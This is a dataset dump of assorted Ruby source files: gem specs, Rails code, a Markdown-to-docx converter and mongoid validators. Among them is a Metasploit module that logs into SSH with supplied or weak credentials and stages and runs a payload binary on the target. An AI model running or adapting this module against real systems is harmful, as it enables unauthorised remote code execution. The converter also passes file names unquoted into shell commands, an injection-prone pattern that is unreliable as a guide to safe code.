hexsha (stringlengths 40-40) | size (int64 2-1.01M) | content (stringlengths 2-1.01M) | avg_line_length (float64 1.5-100) | max_line_length (int64 2-1k) | alphanum_fraction (float64 0.25-1) |
---|---|---|---|---|---|
1ad71f89528a8b27a1c2ee3952957cef0b019a13 | 450 | cask 'ipvanish-vpn' do
version '2.2.1_234'
sha256 '0f44ac51d46c5fa09131719548dc73760a4db7005a999b1f9cc4c295f37e15b8'
url "https://www.ipvanish.com/software/osx/IPVanish_v#{version}.zip"
appcast 'https://www.ipvanish.com/software/osx/updates.xml',
checkpoint: '999bcbe8e257f51dd07573199541e90c7fd130db717445024e2cd55b0d916507'
name 'IPVanish'
homepage 'https://www.ipvanish.com/'
license :gratis
app 'IPVanish VPN.app'
end
| 32.142857 | 88 | 0.771111 |
7943f4121e396016ce7fb0ce808bdd62ea6ecd69 | 213 | class RemoveHasPrivateAccessAndSignInCountFromUsers < ActiveRecord::Migration[4.2]
def change
remove_column :users, :has_private_access, :boolean
remove_column :users, :sign_in_count, :integer
end
end
| 30.428571 | 82 | 0.793427 |
18f6bc64e0e2dd146134889c2a256c567312e3e1 | 5,267 | require "optparse"
require "rubygems"
require "tmpdir"
require "pathname"
require "rexml/document"
class MD2XML
def add_header(text, level, body)
@in_list = false
node = REXML::Element.new("w:p", body)
pPr = REXML::Element.new("w:pPr", node)
REXML::Element.new("w:pStyle", pPr).add_attribute("w:val", level)
r = REXML::Element.new("w:r", node)
REXML::Element.new("w:t", r).text = text
end
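# Appends a list item paragraph, allocating a fresh numbering id whenever a
# new list starts or the indent level increases.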
def add_listitem(text, level, style, body)
unless @in_list
@in_list = true
@id += 1
@list_id[level] = @id
end
if level > @current_level
@id += 1
@list_id[level] = @id
end
@current_level = level
myid = @list_id[level]
node = REXML::Element.new("w:p", body)
pPr = REXML::Element.new("w:pPr", node)
pStyle = REXML::Element.new("w:pStyle", pPr)
numPr = REXML::Element.new("w:numPr", pPr)
REXML::Element.new("w:ilvl", numPr).add_attribute("w:val", (level-1).to_s)
REXML::Element.new("w:numId", numPr).add_attribute("w:val", myid)
pstyle_val = REXML::XPath.first(@stylehash[style], "w:pPr/w:pStyle").attribute("w:val")
pStyle.add_attribute("w:val", pstyle_val)
REXML::Element.new("w:ind", pPr).add_attribute("w:leftChars", "0")
r = REXML::Element.new("w:r", node)
REXML::Element.new("w:t", r).text = text
numid = REXML::XPath.first(@stylehash[style], "w:pPr/w:numPr/w:numId").attribute("w:val").to_s
@numIdhash[myid] = @numhash[numid]
end
def add_paragraph(text, body)
@in_list = false
p = REXML::Element.new("w:p", body)
r = REXML::Element.new("w:r", p)
REXML::Element.new("w:t", r).text = text
end
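# Dispatches one Markdown line: "#" headers, numbered items, "*" bullets
# (four spaces of indent per level), or a plain paragraph.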
def parse(line, body)
if line=~/^(#+) (.*)/
add_header(Regexp.last_match(2), Regexp.last_match(1).size, body)
elsif line=~/^(\s*)[0-9]+\. (.*)/
level = Regexp.last_match(1).length/4+1
add_listitem(Regexp.last_match(2), level, "enum"+level.to_s, body)
elsif line=~/^(\s*)\* (.*)/
level = Regexp.last_match(1).length/4+1
add_listitem(Regexp.last_match(2), level, "bullet"+level.to_s, body)
else
add_paragraph(line, body)
end
end
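# Maps each numId in the template's numbering.xml to its abstractNumId and
# tracks the largest numId so new lists can continue from it.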
def make_numhash(dir)
@numhash = {}
file = dir + "/word/numbering.xml"
doc = REXML::Document.new(File.read(file))
REXML::XPath.each(doc.root, "w:num") do |e|
numid = e.attribute("w:numId").to_s.to_i
abstractnumid = REXML::XPath.first(e, "w:abstractNumId").attribute("w:val")
@numhash[numid.to_s] = abstractnumid.to_s.to_i
@id = numid if @id < numid
end
end
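# Rewrites numbering.xml, cloning an abstract numbering definition for every
# list instance created while parsing the Markdown.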
def make_numbering(dir)
file = dir + "/word/numbering.xml"
doc = REXML::Document.new(File.read(file))
abstractNumIds = REXML::XPath.each(doc.root, "w:abstractNum").collect { |e| e }
nums = REXML::XPath.each(doc.root, "w:num").collect { |e| e }
REXML::XPath.first(doc.root).each { |e| doc.root.delete e }
@numIdhash.each do |k, v|
e_abs = Marshal.load(Marshal.dump(abstractNumIds[v]))
e_abs.add_attribute("w:abstractNumId", abstractNumIds.size)
n = REXML::Element.new("w:num")
n.add_attribute("w:numId", k)
REXML::Element.new("w:abstractNumId", n).add_attribute("w:val", abstractNumIds.size)
abstractNumIds.push e_abs
nums.push n
end
abstractNumIds.size.times do |i|
e = abstractNumIds[i]
REXML::XPath.first(e, "w:nsid").add_attribute("w:val", format("%08d", i))
doc.root.add e
end
nums.each { |e| doc.root.add e }
File.write file, doc.to_s
end
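# Collects the enumN/bulletN style paragraphs from the template body, empties
# the body, then appends paragraphs parsed from the Markdown file.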
def make_document(dir, mdfile)
file = dir + "/word/document.xml"
doc = REXML::Document.new(File.read(file))
body = REXML::XPath.first(doc.root, "w:body")
REXML::XPath.each(body, "w:p") do |e|
@stylehash[Regexp.last_match(1)] = e if e.to_s =~/(enum[1-9])/ || e.to_s =~/(bullet[1-9])/
end
REXML::XPath.each(body, "w:p").collect { |e| body.delete_element e }
open(mdfile) do |f|
while line = f.gets
parse(line, body)
end
end
File.write file, doc.to_s
end
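# Resets parser state, then rewrites document.xml and numbering.xml in dir.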
def convert(dir, mdfile)
@id = 0
make_numhash(dir)
@in_list = false
@list_id = Array.new(10)
@stylehash = {}
@current_level = 0
@numIdhash = {}
make_document(dir, mdfile)
make_numbering(dir)
end
end
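# Parses -t/--template and -o/--output options plus the input file argument.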
def parse_option
opts = {}
args = []
OptionParser.new do |op|
op.on("-t [template]", "--template [template file]") { |v| args[:template] = v }
op.on("-o [output]", "--output [output file]") { |v| args[:output] = v }
op.banner += " file"
args = op.parse!(ARGV)
if args.empty?
puts op.help
exit
end
end
[opts, args]
end
opts, args = parse_option
input_file = args[0]
unless File.exist?(input_file)
puts "#{input_file}: No such file or directory"
exit
end
template_file = opts.fetch(:template, "template.docx")
output_default = Pathname(input_file).sub_ext(".docx")
output_file = opts.fetch(:output, output_default)
Dir.mktmpdir(nil, "./") do |dir|
puts "Using #{template_file}"
`cd #{dir};unzip ../#{template_file}`
files = Dir.glob(dir+"/*").map { |f| File.basename(f) }
puts "Reading #{input_file}"
MD2XML.new.convert(dir, input_file)
puts "Generating #{output_file}"
`cd #{dir};zip -r ../#{output_file} #{files.join(" ")}`
puts "Done."
end
| 30.445087 | 98 | 0.618568 |
1816163b2c9dba1fc04e39468c70124842d97a16 | 309 | require "fog/xml/version"
require "nokogiri"
module Fog
autoload :ToHashDocument, "fog/to_hash_document"
module XML
autoload :SAXParserConnection, "fog/xml/sax_parser_connection"
autoload :Connection, "fog/xml/connection"
end
module Parsers
autoload :Base, "fog/parsers/base"
end
end
| 19.3125 | 66 | 0.744337 |
f71fae79348266d1964259ece0e7738d9817dae4 | 1,319 | # -*- encoding: utf-8 -*-
# stub: liquid 3.0.6 ruby lib
Gem::Specification.new do |s|
s.name = "liquid".freeze
s.version = "3.0.6"
s.required_rubygems_version = Gem::Requirement.new(">= 1.3.7".freeze) if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib".freeze]
s.authors = ["Tobias Luetke".freeze]
s.date = "2015-07-24"
s.email = ["[email protected]".freeze]
s.extra_rdoc_files = ["History.md".freeze, "README.md".freeze]
s.files = ["History.md".freeze, "README.md".freeze]
s.homepage = "http://www.liquidmarkup.org".freeze
s.licenses = ["MIT".freeze]
s.rubygems_version = "2.7.4".freeze
s.summary = "A secure, non-evaling end user template engine with aesthetic markup.".freeze
s.installed_by_version = "2.7.4" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
s.add_development_dependency(%q<rake>.freeze, [">= 0"])
s.add_development_dependency(%q<minitest>.freeze, [">= 0"])
else
s.add_dependency(%q<rake>.freeze, [">= 0"])
s.add_dependency(%q<minitest>.freeze, [">= 0"])
end
else
s.add_dependency(%q<rake>.freeze, [">= 0"])
s.add_dependency(%q<minitest>.freeze, [">= 0"])
end
end
| 35.648649 | 116 | 0.661107 |
28cf7c95e5ca6f6ad9fb96c2a9f1c760668ef509 | 658 | module Sinatra
module MercuryImages
# register app
def self.registered(app)
# stream images
app.get %r{(\.gif|\.jpg|\.png|\.jpeg)$} do
content_type get_image_type(request.path_info)
File.open(options.views + request.path_info, 'rb') do |file|
file.read
end
end
end
# get image
def get_image_type(image_name)
if image_name =~ /\.gif/
"image/gif"
elsif image_name =~ /\.jpg/
"image/jpg"
elsif image_name =~ /\.png/
"image/png"
elsif image_name =~ /\.jpeg/
"image/jpeg"
end
end
end
register MercuryImages
end
| 21.933333 | 69 | 0.56383 |
08a8726280286b575aa7ac5b6be3497b84f118df | 3,633 | # Copyright © 2011-2020 MUSC Foundation for Research Development~
# All rights reserved.~
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:~
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.~
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following~
# disclaimer in the documentation and/or other materials provided with the distribution.~
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products~
# derived from this software without specific prior written permission.~
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,~
# BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT~
# SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL~
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS~
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR~
# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.~
class Dashboard::Breadcrumber
include ActionView::Helpers::TagHelper
include Rails.application.routes.url_helpers
def initialize
clear
end
def clear(opts={})
if opts[:crumb]
@crumbs.delete(opts[:crumb])
else
@crumbs = Hash.new
end
if opts[:filters]
@filters = opts[:filters]
end
self
end
def add_crumbs(crumbs)
crumbs.each do |sym, value|
add_crumb(sym, value)
end
self
end
def add_crumb(sym, value)
@crumbs[sym] = value
self
end
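# Builds the breadcrumb trail as <li> tags, starting from the Dashboard link
# and marking the final crumb as active.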
def breadcrumbs
labels_and_urls = [
protocol_label_and_url,
edit_protocol_label_and_url,
ssr_label_and_url,
notifications_label_and_url
].compact
crumbs = [content_tag(:li, content_tag(:a, 'Dashboard', href: dashboard_protocols_path(@filters)))]
labels_and_urls.each_with_index do |breadcrumb_array, index|
label, url = breadcrumb_array
if index == labels_and_urls.size - 1
crumbs << content_tag(:li, label, class: "active")
else
crumbs << content_tag(:li, content_tag(:a, label, href: url))
end
end
crumbs.join(content_tag(:li, '/', class: 'px-2')).html_safe
end
private
def protocol_label_and_url
protocol_id = @crumbs[:protocol_id]
protocol_id ? [("(#{protocol_id}) " + Protocol.find(protocol_id).short_title).truncate(50), "/dashboard/protocols/#{protocol_id}"] : nil
end
def ssr_label_and_url
sub_service_request_id = @crumbs[:sub_service_request_id]
sub_service_request_id ? [SubServiceRequest.find(sub_service_request_id).label.truncate(50), "/dashboard/sub_service_requests/#{sub_service_request_id}"] : nil
end
def notifications_label_and_url
self.clear(crumb: :protocol_id)
self.clear(crumb: :sub_service_request_id)
@crumbs[:notifications] ? [I18n.t('dashboard.notifications.header'), "/dashboard/notifications"] : nil
end
def edit_protocol_label_and_url
protocol_id = @crumbs[:edit_protocol]
protocol_id ? ["Edit", "/dashboard/protocols/#{protocol_id}/edit"] : nil
end
end
| 36.33 | 163 | 0.734104 |
bb5963b22e2c2365c086b29f789ceda930bbccb5 | 573 | # This code is free software; you can redistribute it and/or modify it under
# the terms of the new BSD License.
#
# Copyright (c) 2009-2013, Sebastian Staudt
# This module is used as a wrapper around Steam Condenser's classes
#
# It does not provide any own functionality, but this file is used as an entry
# point when using the gem (i.e. +require 'steam-condenser'+).
#
# @author Sebastian Staudt
module SteamCondenser
end
require 'steam-condenser/logging'
require 'steam-condenser/version'
require 'steam-condenser/community/all'
require 'steam-condenser/servers/all'
| 30.157895 | 78 | 0.769634 |
034e8a6a4e55ce4b4c2e393090282245f1eba600 | 1,425 | # encoding: utf-8
require 'spec_helper'
require Rails.root.join('db', 'post_migrate', '20170313133418_rename_more_reserved_project_names.rb')
# This migration uses multiple threads, and thus different transactions. This
# means data created in this spec may not be visible to some threads. To work
# around this we use the DELETE cleaning strategy.
describe RenameMoreReservedProjectNames, :delete do
let(:migration) { described_class.new }
let!(:project) { create(:project) } # rubocop:disable RSpec/FactoriesInMigrationSpecs
before do
project.path = 'artifacts'
project.save!(validate: false)
end
describe '#up' do
context 'when project repository exists' do
before do
project.create_repository
end
context 'when no exception is raised' do
it 'renames project with reserved names' do
migration.up
expect(project.reload.path).to eq('artifacts0')
end
end
context 'when exception is raised during rename' do
before do
allow(project).to receive(:rename_repo).and_raise(StandardError)
end
it 'captures exception from project rename' do
expect { migration.up }.not_to raise_error
end
end
end
context 'when project repository does not exist' do
it 'does not raise error' do
expect { migration.up }.not_to raise_error
end
end
end
end
| 28.5 | 101 | 0.686316 |
e98a4cb47577be20533ad4e4870fe0cedfece359 | 3,603 | ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'net/ssh'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::CmdStagerBourne
attr_accessor :ssh_socket
def initialize
super(
'Name' => 'SSH User Code Execution',
'Description' => %q{
This module utilizes a stager to upload a base64 encoded
binary which is then decoded, chmod'ed and executed from
the command shell.
},
'Author' => ['Spencer McIntyre', 'Brandon Knight'],
'References' =>
[
[ 'CVE', '1999-0502'] # Weak password
],
'License' => MSF_LICENSE,
'Privileged' => true,
'DefaultOptions' =>
{
'PrependFork' => 'true',
'EXITFUNC' => 'process'
},
'Payload' =>
{
'Space' => 4096,
'BadChars' => "",
'DisableNops' => true
},
'Platform' => %w{ linux osx },
'Targets' =>
[
[ 'Linux x86',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
},
],
[ 'Linux x64',
{
'Arch' => ARCH_X86_64,
'Platform' => 'linux'
},
],
[ 'OSX x86',
{
'Arch' => ARCH_X86,
'Platform' => 'osx'
},
],
],
'DefaultTarget' => 0,
# For the CVE
'DisclosureDate' => 'Jan 01 1999'
)
register_options(
[
OptString.new('USERNAME', [ true, "The user to authenticate as.", 'root' ]),
OptString.new('PASSWORD', [ true, "The password to authenticate with.", '' ]),
OptString.new('RHOST', [ true, "The target address" ]),
Opt::RPORT(22)
], self.class
)
register_advanced_options(
[
OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false])
]
)
end
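# Runs a command over the SSH session, allowing three seconds and swallowing
# errors so a hung command cannot stall the module.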
def execute_command(cmd, opts = {})
begin
Timeout.timeout(3) do
self.ssh_socket.exec!("#{cmd}\n")
end
rescue ::Exception
end
end
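# Opens the SSH session using password or keyboard-interactive authentication,
# translating connection and authentication errors into fail_with reasons.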
def do_login(ip, user, pass, port)
opt_hash = {
:auth_methods => ['password', 'keyboard-interactive'],
:msframework => framework,
:msfmodule => self,
:port => port,
:disable_agent => true,
:password => pass
}
opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
begin
self.ssh_socket = Net::SSH.start(ip, user, opt_hash)
rescue Rex::ConnectionError, Rex::AddressInUse
fail_with(Failure::Unreachable, 'Disconnected during negotiation')
rescue Net::SSH::Disconnect, ::EOFError
fail_with(Failure::Disconnected, 'Timed out during negotiation')
rescue Net::SSH::AuthenticationFailed
fail_with(Failure::NoAccess, 'Failed authentication')
rescue Net::SSH::Exception => e
fail_with(Failure::Unknown, "SSH Error: #{e.class} : #{e.message}")
end
if not self.ssh_socket
fail_with(Failure::Unknown)
end
return
end
def exploit
do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT'])
print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending Bourne stager...")
execute_cmdstager({:linemax => 500})
end
end
| 27.090226 | 101 | 0.547322 |
1132bf61875d6cdf29c8216cb39c3cad4f049ff2 | 128 | class CloseAllTaxAdjustments < ActiveRecord::Migration
def up
Spree::Adjustment.tax.update_all(finalized: true)
end
end
| 21.333333 | 54 | 0.78125 |
1a02e7c41c5313fd0bcc7d248e1e4e1d7d026c68 | 1,478 | require 'rails_helper'
RSpec.describe Herstory::RecordCallbacks do
before :all do
Arrival.logs_changes includes: {users: {}, shipments: {superordinate: :record}}
Thread.current[:current_user] = User.create({name: 'Joanne Doe'})
end
context "when included in a class" do
it "doesn't log a creation event when invalid" do
expect do
Arrival.create(number_of_trucks: 0)
end.to_not change(Event, :count)
end
it "logs a creation event when valid" do
arrival = Arrival.create
expect(arrival.events.first.type).to eq('created')
end
end
context "when invalid save is triggered" do
let(:arrival) { Herstory.without_logging { Arrival.create } }
it "doesn't log attribute changes" do
@params = {number_of_trucks: 0}
expect do
arrival.update(@params)
end.to_not change(arrival.events.reload, :count)
end
it "doesn't log additions to collections" do
shipment = arrival.shipments.build({pieces: 0})
expect do
begin
arrival.shipments << shipment
rescue
end
end.to_not change(arrival.events.reload, :count)
end
end
context "when save is triggered" do
let(:arrival) { Herstory.without_logging { Arrival.create } }
it "logs attribute changes" do
@params = {number_of_trucks: 21}
expect do
arrival.update(@params)
end.to change(arrival.events.reload, :count).by(1)
end
end
end
| 25.050847 | 83 | 0.654939 |
7aaaa57bde3a6d1ce4d7cccdf8d30abaa5a839c5 | 581 | require "test_helper"
class ReadableTest < MiniTest::Spec
Credentials = Struct.new(:password)
class PasswordForm < TestForm
property :password, readable: false
end
let(:cred) { Credentials.new }
let(:form) { PasswordForm.new(cred) }
it {
assert_nil form.password # password not read.
form.validate("password" => "123")
assert_equal form.password, "123"
form.sync
assert_equal cred.password, "123" # password written.
hash = {}
form.save do |nested|
hash = nested
end
assert_equal hash, "password" => "123"
}
end
| 18.741935 | 57 | 0.655766 |
1d0a4e9b200624df94ce7193c314b209d885b46c | 2,613 | class FortniteNewsAndInfo::Fortnite
attr_accessor :brNews, :statsV2, :battle_royale_news, :creative_news, :save_the_world_news, :lifetime_keyboard, :lifetime_gamepad, :lifetime_touch, :lifetime_all
require 'pry'
def initialize
####
#is there a better place to do this????
####
newAPIconection = FortniteNewsAndInfo::API.new
@brNews = newAPIconection.getBRnews
@statsV2 = newAPIconection.get_statsV2
####
# new code to work with objects rather than stored variables
####
gtypes
fortniteGamers
news_type
add_articles
#binding.pry
end
#get subjects
def news_type
self.brNews.each do |name, data|
# binding.pry
if name == "battleroyalenews" || name == "creativenews" || name == "savetheworldnews"
NewsType.new(name)
end
end
end
##add articles
def add_articles
NewsType.all.each do |s|
# binding.pry
# if s.name == "savetheworldnews" || s.name == "battleroyalenews"
# binding.pry
# self.brNews["#{s.name}"]["news"]["messages"].each do |a_data|
# na = Article.new(a_data["title"], a_data["body"], s, a_data["image"])
# s.articles << na
# end
# else
self.brNews["#{s.name}"]["news"]["messages"].each do |a_data|
na = Article.new(a_data["title"], a_data["body"], s, a_data["image"])
s.articles << na
end
# end
end
end
#gets the gamer types and finds or creates a GamerType object for each one
def gtypes
self.statsV2["lifetime"].each do |gt, gs|
# binding.pry
GamerType.find_or_create_by_name(gt)
end
end
#go through each gamertype and get its list of gamers then create each gamer.
def fortniteGamers
#taking gamertype and linking a gamer to it
GamerType.all.each do |gt|
mxd_ary = []
self.statsV2["lifetime"]["#{gt.name}"].each do |gamer|
stats = {}
gamer[1].each do |k,v|
stats[":#{k}"] = v
end
mxd_ary << {":name" => gamer[0], ":stats" => stats }
end
Gamer.create_gamer(gt, mxd_ary)
gt.gamers_scores
gt.top_gamers
# binding.pry
end
end
end | 31.481928 | 165 | 0.511672 |
3944565badb086ad3ca62e0608396a8c5db2cc3e | 9,069 | # -*- encoding: utf-8 -*-
require File.expand_path('../../../spec_helper', __FILE__)
require File.expand_path('../fixtures/common', __FILE__)
describe "File.expand_path" do
before :each do
platform_is :windows do
@base = `cd`.chomp.tr '\\', '/'
@tmpdir = "c:/tmp"
@rootdir = "c:/"
end
platform_is_not :windows do
@base = Dir.pwd
@tmpdir = "/tmp"
@rootdir = "/"
end
end
with_feature :encoding do
before :each do
@external = Encoding.default_external
end
after :each do
Encoding.default_external = @external
end
end
it "converts a pathname to an absolute pathname" do
File.expand_path('').should == @base
File.expand_path('a').should == File.join(@base, 'a')
File.expand_path('a', nil).should == File.join(@base, 'a')
end
not_compliant_on :ironruby do
it "converts a pathname to an absolute pathname, Ruby-Talk:18512" do
# See Ruby-Talk:18512
File.expand_path('.a').should == File.join(@base, '.a')
File.expand_path('..a').should == File.join(@base, '..a')
File.expand_path('a../b').should == File.join(@base, 'a../b')
end
end
platform_is_not :windows do
it "keeps trailing dots on absolute pathname" do
# See Ruby-Talk:18512
File.expand_path('a.').should == File.join(@base, 'a.')
File.expand_path('a..').should == File.join(@base, 'a..')
end
end
it "converts a pathname to an absolute pathname, using a complete path" do
File.expand_path("", "#{@tmpdir}").should == "#{@tmpdir}"
File.expand_path("a", "#{@tmpdir}").should =="#{@tmpdir}/a"
File.expand_path("../a", "#{@tmpdir}/xxx").should == "#{@tmpdir}/a"
File.expand_path(".", "#{@rootdir}").should == "#{@rootdir}"
end
# FIXME: do not use conditionals like this around #it blocks
unless not home = ENV['HOME']
platform_is_not :windows do
it "converts a pathname to an absolute pathname, using ~ (home) as base" do
File.expand_path('~').should == home
File.expand_path('~', '/tmp/gumby/ddd').should == home
File.expand_path('~/a', '/tmp/gumby/ddd').should == File.join(home, 'a')
end
it "does not return a frozen string" do
File.expand_path('~').frozen?.should == false
File.expand_path('~', '/tmp/gumby/ddd').frozen?.should == false
File.expand_path('~/a', '/tmp/gumby/ddd').frozen?.should == false
end
end
platform_is :windows do
it "converts a pathname to an absolute pathname, using ~ (home) as base" do
File.expand_path('~').should == home.tr("\\", '/')
File.expand_path('~', '/tmp/gumby/ddd').should == home.tr("\\", '/')
File.expand_path('~/a', '/tmp/gumby/ddd').should == File.join(home.tr("\\", '/'), 'a')
end
it "does not return a frozen string" do
File.expand_path('~').frozen?.should == false
File.expand_path('~', '/tmp/gumby/ddd').frozen?.should == false
File.expand_path('~/a', '/tmp/gumby/ddd').frozen?.should == false
end
end
end
platform_is_not :windows do
# FIXME: these are insane!
it "expand path with" do
File.expand_path("../../bin", "/tmp/x").should == "/bin"
File.expand_path("../../bin", "/tmp").should == "/bin"
File.expand_path("../../bin", "/").should == "/bin"
File.expand_path("../bin", "tmp/x").should == File.join(@base, 'tmp', 'bin')
File.expand_path("../bin", "x/../tmp").should == File.join(@base, 'bin')
end
it "expand_path for commoms unix path give a full path" do
File.expand_path('/tmp/').should =='/tmp'
File.expand_path('/tmp/../../../tmp').should == '/tmp'
File.expand_path('').should == Dir.pwd
File.expand_path('./////').should == Dir.pwd
File.expand_path('.').should == Dir.pwd
File.expand_path(Dir.pwd).should == Dir.pwd
File.expand_path('~/').should == ENV['HOME']
File.expand_path('~/..badfilename').should == "#{ENV['HOME']}/..badfilename"
File.expand_path('..').should == Dir.pwd.split('/')[0...-1].join("/")
File.expand_path('~/a','~/b').should == "#{ENV['HOME']}/a"
end
not_compliant_on :rubinius, :macruby do
it "does not replace multiple '/' at the beginning of the path" do
File.expand_path('////some/path').should == "////some/path"
end
end
deviates_on :rubinius, :macruby do
it "replaces multiple '/' with a single '/' at the beginning of the path" do
File.expand_path('////some/path').should == "/some/path"
end
end
it "replaces multiple '/' with a single '/'" do
File.expand_path('/some////path').should == "/some/path"
end
it "raises an ArgumentError if the path is not valid" do
lambda { File.expand_path("~a_not_existing_user") }.should raise_error(ArgumentError)
end
it "expands ~ENV['USER'] to the user's home directory" do
File.expand_path("~#{ENV['USER']}").should == ENV['HOME']
File.expand_path("~#{ENV['USER']}/a").should == "#{ENV['HOME']}/a"
end
it "does not expand ~ENV['USER'] when it's not at the start" do
File.expand_path("/~#{ENV['USER']}/a").should == "/~#{ENV['USER']}/a"
end
it "expands ../foo with ~/dir as base dir to /path/to/user/home/foo" do
File.expand_path('../foo', '~/dir').should == "#{ENV['HOME']}/foo"
end
end
ruby_version_is "1.9" do
it "accepts objects that have a #to_path method" do
File.expand_path(mock_to_path("a"), mock_to_path("#{@tmpdir}"))
end
end
it "raises a TypeError if not passed a String type" do
lambda { File.expand_path(1) }.should raise_error(TypeError)
lambda { File.expand_path(nil) }.should raise_error(TypeError)
lambda { File.expand_path(true) }.should raise_error(TypeError)
end
platform_is_not :windows do
it "expands /./dir to /dir" do
File.expand_path("/./dir").should == "/dir"
end
end
platform_is :windows do
it "expands C:/./dir to C:/dir" do
File.expand_path("C:/./dir").should == "C:/dir"
end
end
ruby_version_is "1.9" do
with_feature :encoding do
ruby_version_is ""..."2.0" do
it "produces a String in the default external encoding" do
Encoding.default_external = Encoding::SHIFT_JIS
path = "./a".force_encoding Encoding::CP1251
File.expand_path(path).encoding.should equal(Encoding::SHIFT_JIS)
end
end
ruby_version_is "2.0" do
it "returns a String in the same encoding as the argument" do
Encoding.default_external = Encoding::SHIFT_JIS
path = "./a".force_encoding Encoding::CP1251
File.expand_path(path).encoding.should equal(Encoding::CP1251)
weird_path = "\xde\xad\xbe\xaf".force_encoding Encoding::ASCII_8BIT
File.expand_path(weird_path).encoding.should equal(Encoding::ASCII_8BIT)
end
end
it "expands a path when the default external encoding is ASCII-8BIT" do
Encoding.default_external = Encoding::ASCII_8BIT
File.expand_path("\xde\xad\xbe\xaf", "/").should == "/\xde\xad\xbe\xaf"
end
it "expands a path with multi-byte characters" do
File.expand_path("Ångström").should == "#{@base}/Ångström"
end
it "raises an Encoding::CompatibilityError if the external encoding is not compatible" do
Encoding.default_external = Encoding::UTF_16BE
lambda { File.expand_path("./a") }.should raise_error(Encoding::CompatibilityError)
end
end
end
it "does not modify the string argument" do
str = "./a/b/../c"
File.expand_path(str, @base).should == "#{@base}/a/c"
str.should == "./a/b/../c"
end
it "does not modify a HOME string argument" do
str = "~/a"
File.expand_path(str).should == "#{home_directory.tr('\\', '/')}/a"
str.should == "~/a"
end
it "returns a String when passed a String subclass" do
str = FileSpecs::SubString.new "./a/b/../c"
path = File.expand_path(str, @base)
path.should == "#{@base}/a/c"
path.should be_an_instance_of(String)
end
end
platform_is_not :windows do
describe "File.expand_path when HOME is not set" do
before :each do
@home = ENV["HOME"]
end
after :each do
ENV["HOME"] = @home
end
it "raises an ArgumentError when passed '~' if HOME is nil" do
ENV.delete "HOME"
lambda { File.expand_path("~") }.should raise_error(ArgumentError)
end
it "raises an ArgumentError when passed '~/' if HOME is nil" do
ENV.delete "HOME"
lambda { File.expand_path("~/") }.should raise_error(ArgumentError)
end
ruby_version_is ""..."1.8.7" do
it "returns '/' when passed '~' if HOME == ''" do
ENV["HOME"] = ""
File.expand_path("~").should == "/"
end
end
ruby_version_is "1.8.7" do
it "raises an ArgumentError when passed '~' if HOME == ''" do
ENV["HOME"] = ""
lambda { File.expand_path("~") }.should raise_error(ArgumentError)
end
end
end
end
| 34.222642 | 95 | 0.605469 |
f887dc569acf91cc6354b4f5e2adb06531544b91 | 10,155 | # frozen_string_literal: true
# encoding: utf-8
module Mongoid
module Validatable
# Validates whether or not a field is unique against the documents in the
# database.
#
# @example Define the uniqueness validator.
#
# class Person
# include Mongoid::Document
# field :title
#
# validates_uniqueness_of :title
# end
#
# It is also possible to limit the uniqueness constraint to a set of
# records matching certain conditions:
# class Person
# include Mongoid::Document
# field :title
# field :active, type: Boolean
#
# validates_uniqueness_of :title, conditions: -> {where(active: true)}
# end
class UniquenessValidator < ActiveModel::EachValidator
include Queryable
# Validate the document for uniqueness violations.
#
# @example Validate the document.
# validate_each(person, :title, "Sir")
#
# @param [ Document ] document The document to validate.
# @param [ Symbol ] attribute The field to validate on.
# @param [ Object ] value The value of the field.
#
# @return [ Errors ] The errors.
#
# @since 1.0.0
def validate_each(document, attribute, value)
with_query(document) do
attrib, val = to_validate(document, attribute, value)
return unless validation_required?(document, attrib)
if document.embedded?
validate_embedded(document, attrib, val)
else
validate_root(document, attrib, val)
end
end
end
private
# Add the error to the document.
#
# @api private
#
# @example Add the error.
# validator.add_error(doc, :name, "test")
#
# @param [ Document ] document The document to validate.
# @param [ Symbol ] attribute The name of the attribute.
# @param [ Object ] value The value of the object.
#
# @since 2.4.10
def add_error(document, attribute, value)
document.errors.add(
attribute, :taken, options.except(:case_sensitive, :scope).merge(value: value)
)
end
# Should the uniqueness validation be case sensitive?
#
# @api private
#
# @example Is the validation case sensitive?
# validator.case_sensitive?
#
# @return [ true, false ] If the validation is case sensitive.
#
# @since 2.3.0
def case_sensitive?
!(options[:case_sensitive] == false)
end
# Create the validation criteria.
#
# @api private
#
# @example Create the criteria.
# validator.create_criteria(User, user, :name, "syd")
#
# @param [ Class, Proxy ] base The base to execute the criteria from.
# @param [ Document ] document The document to validate.
# @param [ Symbol ] attribute The name of the attribute.
# @param [ Object ] value The value of the object.
#
# @return [ Criteria ] The criteria.
#
# @since 2.4.10
def create_criteria(base, document, attribute, value)
